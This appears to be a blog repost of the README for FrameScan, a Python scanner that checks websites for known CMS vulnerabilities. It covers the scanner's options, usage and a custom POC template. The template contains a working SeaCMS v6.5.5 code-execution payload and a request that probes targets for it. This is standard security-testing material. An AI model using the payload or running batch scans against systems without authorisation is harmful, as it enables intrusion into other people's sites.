FrameScan CMS漏洞扫描
工具简介
GithubL:https://github.com/qianxiao996/FrameScan
FrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。
支持平台
Windows
Linux
MAC(请自测)
工具特点
单URL批量检测
单URL单漏洞检测
单URL指定CMS检测
多URL单漏洞检测
单URL单漏洞检测
单URL指定CMS检测
详细参数如下:
-u Url URL地址
-f Load urls file 文件路径
-m Use poc module 使用单个POC
-c Specify CMS 指定CMS类型
-s Search poc keywords 查找关键词漏洞
-lc List CMS POC 列出指定CMS漏洞
-l List avalible pocs 列出所有POC
-r Reload POC 重新加载POC
-txt Save Result(txt) 输出扫描结果(txt)
-html Save Result(html) 输出扫描结果(html)
-h Get help 帮助信息
使用方法
下载项目
安装依赖(不需要!)
脚本主要依赖于以下模块(无需安装)
import sys,os,re
from color import *
import sqlite3,requests
运行脚本
>python3 FrameScan.py
     _____                         ____
    |  ___| __ __ _ _ __ ___   ___/ ___|  ___ __ _ _ __
    | |_ | '__/ _` | '_ ` _ \ / _ \___ \ / __/ _` | '_ \
    |  _|| | | (_| | | | | | |  __/___) | (_| (_| | | | |
    |_|  |_|  \__,_|_| |_| |_|\___|____/ \___\__,_|_| |_|
    Options:                          Code by qianxiao996
    -----------------------------------------------------
    -u          Url                      URL地址
    -f          Load urls file           文件路径
    -m          Use poc module           使用单个POC
    -c          Specify CMS              指定CMS类型
    -s          Search poc keywords      查找关键词漏洞
    -lc         List CMS POC             列出指定CMS漏洞
    -l          List avalible pocs       列出所有POC
    -r          Reload POC               重新加载POC
    -txt        Save Result(txt)         输出扫描结果(txt)
    -html       Save Result(html)        输出扫描结果(html)
    -h          Get help                 帮助信息
    -----------------------------------------------------
    FrameScan  V1.1              Blog:blog.qianxiao996.cn
单URL批量检测
python3 FrameScan.py -u URL
单URL单漏洞检测(POC_METHOS可以用 -l、-s、-lc进行查询)
python3 FrameScan.py -u URL -m POC_METHOS
单URL指定CMS检测
python3 FrameScan.py -u URL -m POC_METHOS
多URL批量检测
python3 FrameScan.py -f 文件名
多URL单漏洞检测
python3 FrameScan.py -f 文件名  -m  POC_METHOS
多URL指定CMS检测
python3 FrameScan.py -f 文件名  -c  CMS类型
输出到TXT或者HTML文件
python3 FrameScan.py -u URL -txt   文件名
python3 FrameScan.py -u URL -html  文件名
自定义POC模板
代码中采用自定义彩色输出,请尽量规范编写。脚本中为示例代码。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 漏洞名称(禁止换行)控制在30字以内
referer: 漏洞地址(禁止换行)未知请填unknown
author: 作者名
description: 漏洞描述
'''
import sys
import requests
import warnings
def run(url):
    #此处编辑检测代码
    #示例代码,请更改result内容,result[0]为漏洞名称,result[1]为返回的内容,result[2]为测试结果
    result = ['seacms v6.5.5代码执行漏洞','','']
    headers = {
        "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = "searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*"
    url_path = url + "/search.php?phpinfo();"
    try:
        data = requests.get(url_path, timeout=3,headers=headers, verify=False)
        if data.status_code == 200 and 'phpinfo' in data.text:
            result[2]= "存在"
            result[1] = "URL:%s\nPOST:%s"%(url_path,payload)
        else:
            result[2] = "不存在"
    except Exception as e:
        # print (e)
        result[2] ="不存在"
        #这里可设置未知,连接超时等,只有不存在不会显示到结果中。
    return result
    #最后一定要返回一个带有3个参数的列表。不然会出错误。
if __name__ == "__main__":
    #此处不会调用
    warnings.filterwarnings("ignore")
    testVuln = run("http://baidu.com")
    print(testVuln)
鸣谢
POC多数来源于 AngelSword:https://github.com/Sch01ar/AngelSword 部分为自己编写,欢迎投递POC
邮箱地址:qianxiao996@126.com
警告!
请勿用于非法用途!否则自行承担一切后果
FrameScan CMS漏洞扫描的更多相关文章
- FrameScan-GUI  CMS漏洞扫描
		
工具简介 FrameScan-GUI是一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架,是FrameScan的加强版.支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行 ...
 - Web漏洞扫描工具(批量脱壳、反序列化、CMS)
		
一.什么是Web漏洞扫描工具 即是指“扫描Web应用以查找安全漏洞(如跨站脚本,SQL注入,命令执行,目录遍历和不安全服务器配置)的自动化工具”,其中许多可能是由不安全或不正确的编码和设计.另一方面, ...
 - Kali Linux渗透基础知识整理(二)漏洞扫描
		
Kali Linux渗透基础知识整理系列文章回顾 漏洞扫描 网络流量 Nmap Hping3 Nessus whatweb DirBuster joomscan WPScan 网络流量 网络流量就是网 ...
 - RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具
		
无事早上就去逛freebuf看到一款不错的工具,打算介绍给大家 RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具 RED HAWK 最新版本:v1.0.0[2017年6月11日] 下 ...
 - web漏洞扫描工具集合
		
最好用的开源Web漏洞扫描工具梳理 链接:www.freebuf.com/articles/web/155209.html 赛门铁克2017年互联网安全威胁报告中提出在他们今年扫描的网站中,有76%都 ...
 - 20165223《网络对抗技术》Exp6 信息搜集与漏洞扫描
		
目录 -- 信息搜集与漏洞扫描 实践说明 实践目标 基础知识问答 实践内容 各种搜索技巧的应用 Google搜索引擎扫描--Google Hacking msf搜索引擎扫描--搜索网址目录结构 搜索特 ...
 - (转译)2019年WEB漏洞扫描工具和软件前十名推荐
		
这些工具都有助于发现漏洞,从而最大限度地提高测试人员的时间和效率.这些工具,2019年更新,也可用于寻找漏洞. 为何扫描? 这资源是什么? Web应用程序对黑客具有极大的吸引力,并且出于百万种不同的原 ...
 - SZhe_Scan碎遮:一款基于Flask框架的web漏洞扫描神器
		
SZhe_Scan碎遮:一款基于Flask框架的web漏洞扫描神器 天幕如遮,唯我一刀可碎千里华盖,纵横四海而无阻,是谓碎遮 --取自<有匪> 写在前面 这段时间很多时间都在忙着编写该项目 ...
 - APP漏洞扫描用地址空间随机化
		
APP漏洞扫描用地址空间随机化 前言 我们在前文<APP漏洞扫描器之本地拒绝服务检测详解>了解到阿里聚安全漏洞扫描器有一项静态分析加动态模糊测试的方法来检测的功能,并详细的介绍了它在针对本 ...
 
随机推荐
- 关于Synchronized你了解多少?
			
1.说一说自己对于 synchronized 关键字的了解 synchronized是解决多线程之间访问资源的同步性,synchronized关键字可以保证被他修饰的资源在任何时刻只有一个线程访问. ...
 - 1、Linux基础--相关软件安装与网络配置
			
1.虚拟机(VM安装) 2.网络配置 3.Linux操作系统安装 4.xshell安装
 - Solution -「51nod 1355」斐波那契的最小公倍数
			
\(\mathcal{Description}\) Link. 令 \(f\) 为 \(\text{Fibonacci}\) 数列,给定 \(\{a_n\}\),求: \[\operatorn ...
 - elasticsearch查询之三种fetch id方式性能测试
			
一.使用场景介绍 elasticsearch除了普通的全文检索之外,在很多的业务场景中都有使用,各个业务模块根据自己业务特色设置查询条件,通过elasticsearch执行并返回所有命中的记录的id: ...
 - C#使用 WebRequest 异步获取网页并自动忽略SSL证书
			
C#使用 WebRequest 模拟浏览器请求访问网页并自动忽略HTTPS安全证书 以下两个C#异步方法,封装了WebRequest请求,支持忽略SSL证书. 作者:张赐荣 1.Get请求 ...
 - 使用MyBatis拦截器后,摸鱼时间又长了。🐟
			
场景 在后端服务开发时,现在很流行的框架组合就是SSM(SpringBoot + Spring + MyBatis),在我们进行一些业务系统开发时,会有很多的业务数据表,而表中的信息从新插入开始,整个 ...
 - python-利用shutil模块rmtree方法可以将文件及其文件夹下的内容删除
			
import shutil import os image_path = os.path.join(os.path.dirname(__file__),'image') # 如果存在image目录则删 ...
 - Nginx基本简述
			
一.Nginx简介 Nginx是一个开源且高性能.可靠的HTTP中间件.代理服务. 开源:直接获取源代码 高性能:支持海量高并发 1.nginx应用场景: 静态处理 (对静态页面的处理,不管是ht ...
 - 运行jar包使用外部依赖
			
nohup java -Dloader.path="lib/" -Dfile.encoding=utf-8 -jar test.jar > test.out 2>&am ...
 - 更快的网络文件系統 — Oxfs
			
什麽时候需要网络文件系统 ? 做嵌入式的同学经常会使用 NFS 将 host 上的某个目录挂载到开发板上,方便 host 上编译构建后能直接在板子上运行,减少手工拷贝操作.网站开发时,在 host 上 ...